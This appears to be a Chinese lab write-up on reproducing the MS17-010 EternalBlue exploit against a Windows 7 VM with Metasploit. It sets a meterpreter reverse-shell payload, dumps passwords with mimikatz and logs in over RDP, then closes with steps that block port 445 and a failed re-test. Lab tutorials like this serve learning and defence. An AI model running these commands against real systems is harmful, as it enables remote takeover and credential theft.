ms17_010漏洞复现

二、环境搭建
测试环境:攻击机:kail(192.168.132.132)
靶机:win7 x64(192.168.132.128)
虚拟机:VMware workstation
2.1 利用VMware workstation搭建MS17_010漏洞环境
1)为保证虚拟机下的win7和kail能互相ping通,要做2步

第一步:虚拟机下的win7和kail都设置为桥接模式

第二步:把win7的防火墙关了:控制面板-系统和安全-windows防火墙-打开或关闭windows防火墙

2) 为保证虚拟机下的win7的445端口打开

三、漏洞复现
利用kail的msf进行攻击。
3.1 启动msf
root@kali:~# msfconsole

3.2 寻找ms17_010漏洞

msf5 > search ms17_010

msf5 > use 2【利用2漏洞】
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options【显示配置】

3.3 配置【目标地址RHOST】【PAYLOAD】【本地地址LHOST】
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.132.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.132.132

四、攻击

4.1 利用meterpreter进行攻击
查看权限:meterpreter > getuid

桌面截图:meterpreter > screenshot

4.2拿到对方系统所有用户的用户名/密码,只需2步
第一步:用meterpreter中的mimikatz模块密码
meterpreter > load mimikatz

第二步:获取用户密码
meterpreter > wdigest

4.3.远程桌面连接,另起终端,可以在对方主机上做任何事
root@kali:~# rdesktop 192.168.132.133 -u xuanxi -p 123456

五、加固后检查
使用策略封闭445端口进行抵御
5.1 加固
1.win7 ctrl+R打开运行窗口,输入gpedit打开本地安全策略

2.计算机配置–windows设置–安全设置–IP安全策略

3.右键创建新安全策略,一直下一步,直到IP筛选列表

4. 一直下一步,直到以下这一步,点击“添加”

  1. 一直点下一步,直到以下这一步,目标地址,选择“我的IP地址”

6.选择协议类型,“tcp”

7.一直下一步,直到以下这一步,端口“445”

8.一直下一步,直到“完成”,列表上会新加一行

9.把刚才加的添加上

10.一直点下一步,直到以下,选择“阻止”

11.完成,然后右击,选择“分配”

5.2检查
再用msf攻击一遍
在这里插入图片描述

攻击失败,升级成功。

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值